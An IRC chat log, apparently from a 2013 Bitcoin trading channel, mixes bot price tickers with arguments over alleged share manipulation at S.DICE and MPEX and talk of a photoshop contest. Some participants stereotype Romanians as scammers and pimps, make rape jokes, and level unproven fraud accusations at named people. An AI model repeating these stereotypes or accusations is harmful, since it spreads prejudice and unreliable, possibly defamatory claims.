lol you forget when he tried to kick me before? Mar 26 07:22:52 what the fuck do you think, my memory is three months long like the forums ? Mar 26 07:23:10 i'd say the forum is < 1 week Mar 26 07:23:21 toffoo that's a point. Mar 26 07:24:18 i called nefario a scammer before he kicked me, and 6 months before that i would not give him my id cuz i said he could not be trusted and his site was not safe.. the forum posts are still there Mar 26 07:24:29 he said he was going to kick me but never did, he backed down Mar 26 07:24:32 https://bitcointalk.org/index.php?topic=157789.msg1677033#msg1677033 Mar 26 07:24:38 lmao! this is TOTALLY glbse all over again Mar 26 07:26:03 [HAVELOCK] [SDICE] 1 @ 0.46 BTC [-] Mar 26 07:26:29 odd Mar 26 07:26:41 how convenient they register in delaware Mar 26 07:26:52 well, it is a real company Mar 26 07:26:56 most secretive laws regarding corps Mar 26 07:27:04 msot everyone registers there Mar 26 07:27:13 i would say it is not exactly like glbse and theymos unless there is stuff going on i dont know about Mar 26 07:27:16 yes for tax and secrecy Mar 26 07:27:19 yeah Mar 26 07:27:28 and for speed and cheapness and really... that's what delaware does Mar 26 07:27:32 sorta like idaho and potatoes Mar 26 07:27:39 "Looking to borrow 600 BTC @ 3.5% weekly ianbakewell" << heh Mar 26 07:27:56 nevada is pretty good too (for registering, not potatoes) Mar 26 07:28:56 sheesh Mar 26 07:28:59 i wonder if bakewell is the guy's rea; name Mar 26 07:29:03 ianbakewell is still around? and asking for money? oh lol Mar 26 07:29:05 3.5% weekly Mar 26 07:29:12 that's the old thread i quoted Mar 26 07:29:25 I pay 0.21% weekly and I find that a lot. Mar 26 07:29:26 ok Mar 26 07:29:28 its his real name Mar 26 07:29:36 so? Mar 26 07:29:45 lots of scammers used their real name Mar 26 07:30:00 bernie maddoff did Mar 26 07:30:05 i asked cause its humorous. i know its bad form to make fun of a fellow's name Mar 26 07:30:14 mernie madoff is funny one too Mar 26 07:30:14 the moment of truth for ian is 29th of march Mar 26 07:30:28 thats his 1st cheduled payment Mar 26 07:30:49 he can only make it if the btc price is down Mar 26 07:30:49 He actually got the 600 BTC? Mar 26 07:31:02 yes Mar 26 07:31:06 what did he spent that on? Mar 26 07:31:07 he picked a bad time to short btc Mar 26 07:31:15 Namworld he shorted btc at 30 Mar 26 07:31:15 and it says on his sig, short btc at 34.50 Mar 26 07:31:18 namworld shorted btc Mar 26 07:31:19 when does he have to rebuy his S.DICE shares too? you know he hasn't done that yet Mar 26 07:31:19 that hurts like a bitch Mar 26 07:31:20 oh... Mar 26 07:31:29 thats may Mar 26 07:31:30 in may Mar 26 07:31:31 pigeons prolly after they go to 80 Mar 26 07:31:43 TF is on the receiving end of that share short Mar 26 07:31:44 25,200 USD lost at 72 USD/BTC Mar 26 07:31:50 600x42 Mar 26 07:31:55 he did well at shorting s.dice Mar 26 07:31:58 hence him defaulting Mar 26 07:31:58 btc? not so much Mar 26 07:32:01 ;;ticker Mar 26 07:32:01 BTCUSD ticker | Best bid: 74.66999, Best ask: 74.67000, Bid-ask spread: 0.00001, Last trade: 74.67000, 24 hour volume: 81024.62335997, 24 hour low: 71.25319, 24 hour high: 78.00000, 24 hour vwap: 74.68722 Mar 26 07:32:03 did he even say what his s.dice short cost basis was ? Mar 26 07:32:10 it was 0.62 Mar 26 07:32:16 a then he's ahead there Mar 26 07:32:20 cuz fuck the extra zeros Mar 26 07:32:29 then be consistent, say 62 Mar 26 07:32:34 sdice is too dangerous to short because voorhees has 90% of them and can always manipulate earnings Mar 26 07:32:40 or .62 Mar 26 07:32:50 just two digit most relevant works imo Mar 26 07:33:04 20k BTC till 95 USD/BTC ... Mar 26 07:33:07 voorhees can simply use his buying power to bully short sellers into massive losses Mar 26 07:33:10 well he's trying to have less than 90%, he's working on it Mar 26 07:33:10 btc is 74, sdice is 45 and smpoe 68 or w/e Mar 26 07:33:24 tiber, more conspiracy theories please Mar 26 07:33:24 pigeons: hell have to fake more playing Mar 26 07:33:41 tiberiusiv that's really a discredited argument you know. Mar 26 07:33:50 no it isnt. Mar 26 07:33:56 right. because you'd know. Mar 26 07:33:59 tiberiusiv: that's an unproven allegation that we've all been over. we're all interested only if you have some proof Mar 26 07:34:01 if it was, voorhees wouldnt still have 90% of shares. Mar 26 07:34:10 think for a moment. if he has 90% of the shares or if he has 500k BTC it's all the same. Mar 26 07:34:18 plenty of people can bully shorts if they chose to. Mar 26 07:34:18 the proof is that more people arent willing to buy shares Mar 26 07:34:24 hokers and blow odds are Mar 26 07:34:24 seems to be what most do Mar 26 07:34:29 that's not how proof works, that's how circular arguments work. Mar 26 07:34:43 mp: id expect you to defend him since your own operations are beyond shady as well. Mar 26 07:35:07 you know there's a long history of hotheads with nothing to show just like yourself tried that entire approach. Mar 26 07:35:12 i'm still here. Mar 26 07:35:17 mpex is what 95% owned by you? theres no way to tell how many of your "options" trades are real Mar 26 07:35:20 88% Mar 26 07:35:42 you only need to get rid of 10-20% shares at inflated valuations to pocket millions Mar 26 07:35:44 to gullible idiots Mar 26 07:35:45 that's bill gates and warren buffet of btc right there Mar 26 07:35:45 stop running around the field. the point of discussion here is that the holding % makes no difference. Mar 26 07:35:57 if i have 500k btc in cash and you short something, Mar 26 07:35:58 ANYTHING Mar 26 07:36:03 i can burn you. Mar 26 07:36:18 it's immaterial if this wealth is in shares or btc or anything. Mar 26 07:36:22 yea and you have proceeds from the existing share sales Mar 26 07:36:25 so does voorhees Mar 26 07:36:28 to burn shorts. Mar 26 07:36:35 that was my entire point Mar 26 07:36:43 right. so basically your argument reduces to "we can't short bcause we don't control the money supply" Mar 26 07:36:46 this is true, you don't. Mar 26 07:36:58 however, needing this argument shows your shorts are a power play, not a market play. Mar 26 07:37:07 and it is all as it should be : you aren't the ones in power for a very good reason. Mar 26 07:37:16 that reason is that you suck, however packaged Mar 26 07:37:23 that you're new, or clueless, or haven't done anything worth the mention. Mar 26 07:37:28 fact is this, sdice has been around about 1 year now and is so "profitable" yet voorhees cant sell more shares. Mar 26 07:37:35 power always concentrates in the hand of the elders, and the productive, and the smart. Mar 26 07:37:40 same with mpex and its 30mil of notional contracts Mar 26 07:37:44 you presume "can't". Mar 26 07:37:49 yet nobody wants the shares in mass. Mar 26 07:37:55 dude srsly. Mar 26 07:38:00 however a verified business like cavirtex sells out in a few hours. Mar 26 07:38:05 [BTCTC] [ASICMINER-PT] 3 @ 0.74 = 2.22 BTC [+] Mar 26 07:38:06 fiction is one thing, but you're veering into delusion. Mar 26 07:38:08 [BTCTC] [ASICMINER-PT] 2 @ 0.75 = 1.5 BTC [+] Mar 26 07:38:12 !ticker m s.mpoe Mar 26 07:38:13 [MPEX:S.MPOE] 1D: 0.00062546 / 0.000641 / 0.00066783 (305707 shares, 195.96 BTC), 7D: 0.00062546 / 0.00069767 / 0.00077505 (2232450 shares, 1,557.51 BTC), 30D: 0.00061614 / 0.00072244 / 0.00078628 (31470843 shares, 22,735.98 BTC) Mar 26 07:38:19 !ticker havelock vtx Mar 26 07:38:20 [HAVELOCK:VTX] 1D: 0.50000000 / 0.71964458 / 0.79900000 (408 shares, 293.61499054 BTC), 7D: 0.38280000 / 0.41994834 / 0.79900000 (11169 shares, 4690.40300358 BTC), 30D: 0.38280000 / 0.41994834 / 0.79900000 (11169 shares, 4690.40300358 BTC) Mar 26 07:38:25 compare 22k to 4k btc. Mar 26 07:38:27 do you get it now ? Mar 26 07:38:33 and this was on their motherfucking ipo. Mar 26 07:38:34 mircea: i am? you only need to dump 10-20% of your grossly overvalued shares to pocket millions Mar 26 07:38:48 except i'm not doing it, because they're not overvalued. Mar 26 07:38:50 virtex does a small % of volume compared to what you claim you do Mar 26 07:38:57 i wouldn't sell my state in s.mpoe for 50mn usd in cash today. Mar 26 07:39:06 [BTCTC] [ASICMINER-PT] 1 @ 0.65508 BTC [-] Mar 26 07:39:06 yea right Mar 26 07:39:08 [BTCTC] [ASICMINER-PT] 1 @ 0.6432 BTC [-] Mar 26 07:39:11 yeah. Mar 26 07:39:12 [BTCTC] [ASICMINER-PT] 1 @ 0.63 BTC [-] Mar 26 07:39:35 if anything, i'm oversold. s.mpoe is on the long term worth more than jpm. Mar 26 07:39:48 quote of the day? Mar 26 07:39:49 yea with all of its 1 unique asset Mar 26 07:39:56 toffoo totally. Mar 26 07:40:02 tiberiusiv it's unique asset is me. Mar 26 07:40:05 put it in your sig Mar 26 07:40:11 jpm doesn't have a mp equivalent for the fiat space. Mar 26 07:40:19 mp: yes the typical sociopathic quotes. Mar 26 07:40:28 since morgan's unfortunate demise early 1900s Mar 26 07:41:41 mp: and you being in one of the largest fraud centers of the world doesn't help your case either. Mar 26 07:41:47 romania. Mar 26 07:41:55 right, because this is thinking. Mar 26 07:42:16 jp, jr Mar 26 07:42:21 mp: 10-20% of your shares get sold you pocket millions, on a business where nobody can verify actual activity on. Mar 26 07:42:33 lol cuz he is in romania must be scam? facepalm Mar 26 07:42:33 exactly. Mar 26 07:42:33 anyone can bot up options trades. Mar 26 07:42:35 this is btc. Mar 26 07:42:44 the entire point of btc is that nobody can "verify". Mar 26 07:42:49 im in thailand, i must be a lady boy right? lol Mar 26 07:42:50 [BTCTC] [ASICMINER-PT] 4 @ 0.61 = 2.44 BTC [-] Mar 26 07:42:57 which is all the better, let the wannabe "verificators" mind their own business. Mar 26 07:43:04 [HAVELOCK] [VTX] 1 @ 0.66 BTC [-] Mar 26 07:43:16 chaangnoi: thats why nby credible wants to list on his exchange, romania is internet fraud capital. Mar 26 07:43:23 and to be clear : tyhis isn't a "case" im making. this is a political statement. Mar 26 07:43:32 yes another drawback Mar 26 07:43:36 bitcoin is exactly about raping the sort of bs you're sprouting. Mar 26 07:43:44 customers dont want to hear political statements. Mar 26 07:43:46 i don't need to persuade you that btc is worth something, or that mpoe is worth someting. Mar 26 07:43:50 lol there are reasons not to use his excahnge, being in romaina is not one of them Mar 26 07:44:00 i'll justg mind my own business indefinitely and you come crawling whenever you're done lubing yourself up. Mar 26 07:44:06 [BTCTC] [ASICMINER-PT] 1 @ 0.63 BTC [+] Mar 26 07:44:29 mircea: of course you will, you have no problem taking the slow and steady approach of selling worthless shares over a longer time period. Mar 26 07:44:35 but the fact alone that the "mpoe is worthless" argument reduces to a "btc is worthless" defeated argument from 2011 Mar 26 07:44:38 why make 1mil when you can make 10 Mar 26 07:44:40 already is good enough. Mar 26 07:44:59 btc code can be viewed by anyone Mar 26 07:45:04 so ? Mar 26 07:45:10 mpex cant be. Mar 26 07:45:15 heh. Mar 26 07:45:21 nobody knows how much of your supposed tens of millions in options is fake. Mar 26 07:45:23 your argument cvhanged from "i can't verify the identity of users" Mar 26 07:45:31 hence why you still own 90% Mar 26 07:45:42 i never argued identify of users Mar 26 07:45:47 users mean nothing. Mar 26 07:45:50 ... Mar 26 07:45:59 nobody on here can verify ANY of the trades/volume mpex does. Mar 26 07:46:05 nobody knows how much of your supposed tens of millions in options is fake. <<< IDENTITY OF USERS Mar 26 07:46:11 think more. speak less.\ Mar 26 07:46:12 hence why you still own 90% of the company Mar 26 07:46:47 i am thinking. Mar 26 07:46:49 the only reason i own 88% of mpoe is tghat i didn't sell more. Mar 26 07:47:04 if one day you actually read the statements you'll see it;'s been going down since 99.5% last year. Mar 26 07:47:08 right same with voorhees Mar 26 07:47:15 there's clear statements made as to plans, they've been followed, etc. Mar 26 07:47:16 im not denying that Mar 26 07:47:23 why wouldnt it be? you need suckers to pay the $ Mar 26 07:47:29 tiberiusiv sounds like you are jelly :/ Mar 26 07:47:30 yes dude. just like btc. Mar 26 07:47:42 nobody issues btc Mar 26 07:47:46 you issue mpex stock. Mar 26 07:47:48 clear difference Mar 26 07:47:52 that's done already. Mar 26 07:47:58 btc can be auditied you cant be Mar 26 07:48:03 if you dont like the stock dont buy it, how is that hard? Mar 26 07:48:06 actually one of the main likely reasons mpoe is worth a lot is exactly that : btc has inflation Mar 26 07:48:09 s.mpoe does not. Mar 26 07:48:20 sure it does Mar 26 07:48:22 so mpoe is becoming / became already the t-bills of btc. Mar 26 07:48:27 the 88% of shares that havent been dumped yet Mar 26 07:48:34 those are issued already. Mar 26 07:48:45 they arent in the market Mar 26 07:48:57 you're arguing both sides. Mar 26 07:49:08 that they are or not doesn't change the dividend per share... Mar 26 07:49:12 if indeed they are worthless then yes they are in the market, burning a hole in my pockets. Mar 26 07:49:28 you cant sell them becuase there is no bids yet, once you inflate the mpex earnings through faking nearly everything mpex related, bids(gullible idiots) will show up to pay you Mar 26 07:49:38 sigh. Mar 26 07:49:44 go harass google, seriously. Mar 26 07:49:54 lol there are not 10 million bids for btc right now either, lol Mar 26 07:50:09 btc must be a scam Mar 26 07:50:09 just as soon as your corp reaches 50mn dollars valuation there's people with nothing in their pocket telling you how your capitalist way are scamming the world Mar 26 07:50:12 btc is completely different Mar 26 07:50:16 totally, yeah. Mar 26 07:50:20 then a stock exchange listing worthless shares Mar 26 07:50:26 of unverifiable companies Mar 26 07:50:33 the emperor tiberius has accepted btc, but not mpoe, so this makes them different Mar 26 07:50:34 anyone can verify BTC integrity Mar 26 07:50:36 in relevant ways. Mar 26 07:50:41 dont buy the stock if you dont like it, clearly someone lkes it Mar 26 07:50:47 of course they do Mar 26 07:50:49 short it for that matter Mar 26 07:50:54 theres a gullible idiot born every minute Mar 26 07:50:55 o wait no, he can't short it cause i have money. Mar 26 07:50:58 and he doesn't. Mar 26 07:51:01 but he's totally right. Mar 26 07:51:02 he only needs to dump a small % to get filthy rich Mar 26 07:51:15 and in romania, identities are sold by the cart load Mar 26 07:51:17 in btc land stupid people get to do stupid things with their money, i love freedom Mar 26 07:51:25 tiberiusiv seriously : if you had a clue you wouldn't be talkign, you would be showing. Mar 26 07:51:36 tiberiusiv how many years have you spent in romania learning their ways? Mar 26 07:51:54 chaangnoi: my good friend was from his city Mar 26 07:52:01 timisoara Mar 26 07:52:09 so you are an expert about all romanians? Mar 26 07:52:16 ya, well, then he can prolly tell you all about how trilema was the most read romanian blog for years Mar 26 07:52:18 since 2009 actually. Mar 26 07:54:16 whatever happened to eskimobob incidentally ? Mar 26 07:55:11 .75 seems to be the new AM pt price as a high Mar 26 07:55:29 not shocked people are selling after the .1 was paid out Mar 26 07:55:31 mircea_popescu I was wondering the same thing. eskimobob = tiberius? Mar 26 07:55:41 maximian nah, im pretty sure they're different. Mar 26 07:55:44 i dont know who that is Mar 26 07:55:52 i mean, still the same 20 something aspirational kid, but eskimobob was kinda esl. Mar 26 07:56:12 yeah, and he was more into muttering to himself Mar 26 07:56:13 tiberiusiv the previous installment of "i won't read because i know better scammors!" Mar 26 07:56:48 [MPEX] [S.MPOE] 6077 @ 0.00064056 = 3.8927 BTC [-] Mar 26 07:56:50 [MPEX] [S.MPOE] 1823 @ 0.00063515 = 1.1579 BTC [-] Mar 26 07:57:03 [HAVELOCK] [SDICE] 3 @ 0.452 = 1.356 BTC [-] Mar 26 07:57:12 i did not buy s.dice cuz i think it was a long term investment, but im fine if others want to buy it, Mar 26 07:57:15 [BTCTC] [ASICMINER-PT] 1 @ 0.695 BTC [+] Mar 26 07:57:30 bad* Mar 26 07:58:00 chaangnoi: i dont care what others do with their $, both sdice and all the mp assets are shady as hell by anyone with 2 IQ points. Mar 26 07:58:13 then do like me, and dont buy them Mar 26 07:58:21 its not hard Mar 26 07:58:30 hey mp, ur fuckup adria comp, its 1 person per shot Mar 26 07:58:39 nah Mar 26 07:58:42 k Mar 26 07:58:42 why are you so butt hurt he found peopleto buy them? Mar 26 07:58:43 can do as many as you please. Mar 26 07:58:51 i found a a good idea Mar 26 07:58:51 lol Mar 26 07:58:58 chaangnoi: im not. just voicing an opinion Mar 26 07:59:12 about romanians = scammers :) Mar 26 07:59:14 if he gets away with it all the power to him, just like madoff victims have only themselves to blame Mar 26 07:59:33 ... Mar 26 07:59:43 chaangnoi: not all romanians are scammers but that area breeds a huge % of them per capita, not to mention all sorts of other criminals they scatter all around europe. Mar 26 08:00:01 i love the freedom in btc land, people get to do what they want. mp is not forcing anyone to do anything Mar 26 08:00:20 neither did madoff Mar 26 08:00:40 nor serghey brin Mar 26 08:00:42 you know.. using btc might be thought of as a crime... maybe mp is a crimanal too, after all did he register his exchange? bow down to the govt, lulz Mar 26 08:00:44 how do you pick your examples ? Mar 26 08:01:07 using btc is no different then using anything as money Mar 26 08:01:34 did you pay sales tax when you use btc? you are crimanal too! Mar 26 08:01:37 not to even bring up mp's rather disgusting/shady porn dealings Mar 26 08:01:55 oh no! sex! must be criminal Mar 26 08:01:59 pimping girls is another thing romanians are notorious for in europe Mar 26 08:02:12 as long as there is concent why do you care? Mar 26 08:02:14 o, i was wondering when we get to that line of nonsense. Mar 26 08:02:42 romanian hookers are dirt cheap because its poor girls that are easy to take advantage of Mar 26 08:02:53 they are sent all over EU by their handlers to top bidders Mar 26 08:03:02 I prefer the term "good value" Mar 26 08:03:11 you know, the sad thing with this "community" or w/e it is is that naysayers are too stupid/lazy to make good arguments. Mar 26 08:03:17 take advantage of, like giving them a job to make good money? yeah... lol they should just starve to death or the govt should hand them piles of money cuz whatever Mar 26 08:03:20 they become trivially easy to defeat, much to the benefit of actual scams Mar 26 08:03:33 if the girl weren't on the forum people like the bitbillions guy would probably have the run of it. Mar 26 08:03:43 im getting sick of having to pay to show people how naysaying is done right Mar 26 08:03:43 mircea you havent defeated any arguement Mar 26 08:03:49 just to not have anyone actually learn anything out of it. Mar 26 08:04:07 tiberiusiv!*@* added to ignore list. Mar 26 08:04:16 lol Mar 26 08:04:31 freemarket Mar 26 08:04:35 yeah. Mar 26 08:04:38 mixed bag. Mar 26 08:05:02 you are proving that to us very well Mar 26 08:05:26 anyway im out for a while, good trading all Mar 26 08:06:47 [BTCTC] [PAJKA.BOND] 4 @ 0.10899 = 0.436 BTC [+] Mar 26 08:11:44 ;;ticker Mar 26 08:11:45 BTCUSD ticker | Best bid: 75.07007, Best ask: 75.88870, Bid-ask spread: 0.81863, Last trade: 75.07004, 24 hour volume: 81261.23957830, 24 hour low: 71.52122, 24 hour high: 78.00000, 24 hour vwap: 74.73248 Mar 26 08:17:49 [BTCTC] [GSDPT] 100 @ 0.00447 = 0.447 BTC [+] Mar 26 08:18:24 [BTCTC] [GSDPT] 61 @ 0.00448 = 0.2733 BTC [+] Mar 26 08:25:28 !ticker m ^oix Mar 26 08:25:29 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 48.45538965 / 71.84497777 / 78.24284189 (49175 shares, 4,680.64 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 26 08:28:45 ;;ticker Mar 26 08:28:46 BTCUSD ticker | Best bid: 75.49001, Best ask: 75.58000, Bid-ask spread: 0.08999, Last trade: 75.49000, 24 hour volume: 81153.14011718, 24 hour low: 71.52122, 24 hour high: 78.00000, 24 hour vwap: 74.73700 Mar 26 08:30:27 Bowjob you got a reddit ? Mar 26 08:30:38 a reddit account, yes Mar 26 08:30:46 be a sport and put adria article up ? Mar 26 08:30:50 need moar entrants wtf. Mar 26 08:31:37 Umm.. I'd get killed if I post that there Mar 26 08:31:45 haha ok Mar 26 08:31:58 gotta find someone with iron undies Mar 26 08:32:12 lol Mar 26 08:32:17 Fine, I'll post it. Mar 26 08:32:30 eh don't ruin your life Mar 26 08:32:57 I don't really post much there anyways, Mar 26 08:33:29 just as long as you won't end up fired or something Mar 26 08:36:08 "I've never seen a fire truck that needed to be shaved before. F" Mar 26 08:36:09 Is this you? Mar 26 08:36:35 nope Mar 26 08:36:46 that sounds like a maddox quote Mar 26 08:36:53 where is it? Mar 26 08:36:56 yes it is a maddox quote Mar 26 08:37:04 on the thread duh Mar 26 08:37:12 i think theres only 3 players so far Mar 26 08:37:23 the last 3 are the same person trying to pretend as 3 people Mar 26 08:37:29 o hey, there's stuff there! Mar 26 08:37:35 duh Mar 26 08:37:46 not the last 3, the last 3 before the last one Mar 26 08:37:48 which is mine Mar 26 08:37:48 lol cool Mar 26 08:38:04 you should get more now, i posted it Mar 26 08:38:18 link ? Mar 26 08:38:35 http://www.reddit.com/r/Bitcoin/comments/1b11il/nsfw_photoshop_contest/ Mar 26 08:38:45 [BTCTC] [ASICMINER-PT] 2 @ 0.73 = 1.46 BTC [+] Mar 26 08:38:45 yeap Mar 26 08:38:55 i enjoyed the short monopoly i had on the contest Mar 26 08:39:08 since the second pic does not depict rape, i would win all the prize lolz Mar 26 08:39:50 lol Mar 26 08:40:06 [BTCTC] [ASICMINER-PT] 2 @ 0.7 = 1.4 BTC [-] Mar 26 08:40:40 http://25.media.tumblr.com/tumblr_lsnmeqaA1C1qgs2k5o1_400.jpg Mar 26 08:41:47 on your article you misspelled photoshop Mar 26 08:41:56 i doubt people would spot it tho Mar 26 08:42:09 i did ? Mar 26 08:42:23 you spelled it as photochop Mar 26 08:42:44 did you see the later update ? Mar 26 08:42:45 and not sure with the capital S in the middle Mar 26 08:43:08 oh, i see Mar 26 08:43:28 The article originally used the word “photochop Mar 26 08:43:53 you know.. Mar 26 08:44:11 my teached back in hs, raised the same issue. The "correct" term is photo-edit Mar 26 08:44:23 no it's not. Mar 26 08:44:27 no one gave a shit and called it photoshopping anyway Mar 26 08:44:27 photoshop. fuck adobe. Mar 26 08:44:28 [BTCTC] [S.DICE-PT] 2 @ 0.00492 = 0.0098 BTC [+] Mar 26 08:44:31 [BTCTC] [S.DICE-PT] 93 @ 0.00495 = 0.4604 BTC [+] Mar 26 08:44:33 [BTCTC] [S.DICE-PT] 318 @ 0.00495 = 1.5741 BTC [+] Mar 26 08:44:49 she told us to "get creative" if we couldnt afford photoshop Mar 26 08:44:57 like... gimp ? Mar 26 08:45:14 nah she was referring to piracy Mar 26 08:45:27 heh Mar 26 08:45:35 its been so many years now i forgot how to photoshop Mar 26 08:46:01 i remember i recreated this pic Mar 26 08:46:01 http://en.wikipedia.org/wiki/File:Voroshilov,_Molotov,_Stalin,_with_Nikolai_Yezhov.jpg Mar 26 08:46:11 i made the dude on stalin's right disappear Mar 26 08:46:25 http://en.wikipedia.org/wiki/File:The_Commissar_Vanishes_2.jpg Mar 26 08:46:27 to that Mar 26 08:47:00 haha Mar 26 08:47:04 the soviets did that. Mar 26 08:47:06 [MPEX] [S.MPOE] 4759 @ 0.00063515 = 3.0227 BTC [-] Mar 26 08:47:19 i was wondering how the hell did they do that back then Mar 26 08:47:26 photoshop.. 0.00001? Mar 26 08:47:29 by hand Mar 26 08:47:32 same way bills were forged Mar 26 08:48:10 looks legit, actually. considering the quality of photgraphs back then Mar 26 08:48:38 yea Mar 26 09:05:25 here you go mp Mar 26 09:05:25 http://polimedia.us/dtng/c/res/18679.html Mar 26 09:08:42 lmao Mar 26 09:08:48 some of these are pretty bad too Mar 26 09:10:08 the last one looks like you Mar 26 09:10:10 lol Mar 26 09:10:14 i got all pumped up to win $750 bux .. then realized I don't have photoshop installed anymore Mar 26 09:10:27 so get gimp Mar 26 09:10:56 Bowjob no it doesn't, my cock is huger. Mar 26 09:11:05 ah, my bad Mar 26 09:11:05 lol Mar 26 09:11:43 these redditors downvoted my post, yet we got some new traffic Mar 26 09:11:59 its either from people here or redditors downvoted my post and joined your contest Mar 26 09:12:50 adria looks like a human poodle Mar 26 09:24:20 mp. wheres that pic of buttcoin Mar 26 09:24:50 which one ? Mar 26 09:25:21 ""Rape is fun..." Mar 26 09:25:21 That's not cool." Mar 26 09:25:37 i recall this carlin bit, "according to 90% of participants, gangrape is great fun" Mar 26 09:25:54 the one where mpoe-pr made this dude shove a pen up his ass Mar 26 09:26:06 o Mar 26 09:26:19 http://polimedia.us/dtng/c/res/17150.html Mar 26 09:26:32 lol Mar 26 09:27:29 ah, the power of buttcoins Mar 26 09:27:45 "o, bitcoin is worthless because i can't buy anything with it" Mar 26 09:27:52 so I went on reddit to upvote your contest, Mar 26 09:28:08 but then downvoted it insteadf Mar 26 09:28:19 and oh dear I didn't notice your favorite bitcoin spokesperson got some more free press again last friday: Mar 26 09:28:20 ;;bids Mar 26 09:28:20 (bids [--under] ) -- Calculate the amount of bitcoin demanded at or over . If '--under' option is given, find coins or at or under . Mar 26 09:28:20 http://www.guardian.co.uk/technology/video/2013/mar/22/bitcoin-currency-video Mar 26 09:28:23 ;;bids 0 Mar 26 09:28:26 There are currently 36697167 bitcoins demanded at or over 0.0 USD, worth 8721857.08948 USD in total. | Data vintage: 0.0167 seconds Mar 26 09:28:47 he plays the role of "squatter" so incredibly well Mar 26 09:29:00 i power laughed at this video Mar 26 09:29:11 toffoo dub already mentioned it. it's funny how most of the guy's following consists of people surprised he's still alive. Mar 26 09:30:06 now that is grungy Mar 26 09:30:23 clearly that abandoned office block has no running shower Mar 26 09:30:37 http://polimedia.us/dtng/c/src/136428266447.jpg Mar 26 09:30:40 worst pic ever Mar 26 09:30:54 lmao Mar 26 09:30:57 somebody found my cock. Mar 26 09:31:10 whoever did that, gratz. you've outdone me Mar 26 09:31:27 mp, im pretty sure thats a vanilla pod Mar 26 09:31:32 Bowjob : Mar 26 09:31:37 ;;google trilema pula mea Mar 26 09:31:38 Cum se protesteaza corect - continuare ilustrativa pe Trilema - Un ...: ; Brigada Diverse in alerta pe Trilema - Un blog de Mircea Popescu.: ; Noi scrisori din Liliput pe Trilema - Un blog de Mircea Popescu.: (1 more message) Mar 26 09:31:42 jesus Mar 26 09:31:47 wtf is this so brojken Mar 26 09:31:57 http://trilema.com/2010/nsfw-pula-mea/ Mar 26 09:32:34 Oh.. i see Mar 26 09:32:35 lol Mar 26 09:32:38 clever Mar 26 09:33:23 so its not a vanilla pod Mar 26 09:33:47 no, it's my epeen Mar 26 09:33:57 in 2010 Mar 26 09:34:45 did it grow these past 3 years Mar 26 09:35:06 yeah Mar 26 09:38:52 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [+] Mar 26 09:39:17 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [+] Mar 26 09:40:35 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [+] Mar 26 09:41:17 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [+] Mar 26 09:43:05 [HAVELOCK] [VTX] 5 @ 0.75 = 3.75 BTC [+] Mar 26 09:49:21 [BTCTC] [BASIC-MINING] 8 @ 0.34999 = 2.7999 BTC [+] Mar 26 09:55:18 [BTCTC] [BTC-BOND] 1 @ 0.009993 BTC [-] Mar 26 09:56:29 [BTCTC] [BTC-BOND] 22 @ 0.009994 = 0.2199 BTC [+] Mar 26 09:57:16 [BTCTC] [BTC-BOND] 3 @ 0.009994 = 0.03 BTC [+] Mar 26 09:59:04 [HAVELOCK] [VTX] 8 @ 0.75 = 6 BTC [+] Mar 26 09:59:38 [BTCTC] [S.DICE-PT] 15 @ 0.00441 = 0.0662 BTC [-] Mar 26 09:59:40 [BTCTC] [S.DICE-PT] 80 @ 0.00441 = 0.3528 BTC [-] Mar 26 10:02:13 hi mircea_popescu, when we can exppect bitbet payouts? Mar 26 10:02:18 [BTCTC] [S.DICE-PT] 31 @ 0.0044 = 0.1364 BTC [-] Mar 26 10:02:30 hm, anything pending? Mar 26 10:04:31 http://bitbet.us/bet/39/network-difficulty-under-6-million/ and at least 2 similar Mar 26 10:05:32 no the ohers are for 12 and 20 million, they better wait Mar 26 10:06:06 ah. presently. Mar 26 10:07:26 [BTCTC] [GSDPT] 7 @ 0.00414 = 0.029 BTC [-] Mar 26 10:07:34 who has done them? if you did, do you plan to create new ones? Mar 26 10:08:04 [BTCTC] [GSDPT] 14 @ 0.00413 = 0.0578 BTC [-] Mar 26 10:08:09 i didn't do them Mar 26 10:08:20 but prolly a good idea for such bets anyway Mar 26 10:08:37 also : introducing the reverse mpex http://mpex.co/?r=1 Mar 26 10:09:16 haha looks even more like 1995 Mar 26 10:09:25 :D Mar 26 10:11:49 it looks good for nighttime trading Mar 26 10:11:50 but.. Mar 26 10:11:52 the dark blue hurts Mar 26 10:12:03 hm Mar 26 10:12:07 perhaps switch to yellow, ala bestpageinteuniverse? Mar 26 10:12:28 lol Mar 26 10:12:50 maybe baby blue ? Mar 26 10:14:42 or green Mar 26 10:15:07 to support bullish mood Mar 26 10:15:09 green'd be an idea lessee Mar 26 10:16:06 [MPEX] [O.BTCUSD.C750T] 1000 @ 0.0689697 = 68.9697 BTC [-] Mar 26 10:16:27 looks like bloomberg! Mar 26 10:18:07 http://mpex.co/?r=1 bettar ? Mar 26 10:18:50 yeap Mar 26 10:18:53 the only prob is Mar 26 10:19:02 it hurts us when we switch from mpex to irc Mar 26 10:19:06 lol ok Mar 26 10:19:20 its a meta prob, nothing to do with site Mar 26 10:19:24 Hmm... did you process two deposit for me mircea? I get confused with all the buying/selling Mar 26 10:19:26 since our eyes would get used to it Mar 26 10:19:26 Bowjob, ur irc client doesn't have dark skin? Mar 26 10:19:31 irc? Mar 26 10:19:33 I've been doing Mar 26 10:19:36 urgh... Mar 26 10:19:38 i dunno how to do that Mar 26 10:19:40 Hmm... Mar 26 10:19:52 ;;darkskin Mar 26 10:19:52 Yeah, looks like it. Mar 26 10:19:53 Error: "darkskin" is not a valid command. Mar 26 10:19:57 ;;help Mar 26 10:19:57 The bot responds when you start a line with the ! character. A good starting point for exploring the bot is the !facts command. You can also visit the bot's website for a list of help topics and documentation: http://gribble.sourceforge.net/ Mar 26 10:20:26 don't think gribble can do it... he seems caucasian Mar 26 10:22:05 nothing pending. Mar 26 10:22:42 Yeah, looks like it was processed Mar 26 10:23:08 Looking at the list of sales/purchases on my command line, seems like my two deposits are in there now. Mar 26 10:24:21 [MPEX] [S.MPOE] 3800 @ 0.00063515 = 2.4136 BTC [-] Mar 26 10:25:18 Price looks on the rise. I got some calls. I'm all good. Mar 26 10:26:48 Namworld, which client are you using? pympex logs by default now Mar 26 10:27:31 ;;ticker Mar 26 10:27:31 BTCUSD ticker | Best bid: 76.21001, Best ask: 76.50000, Bid-ask spread: 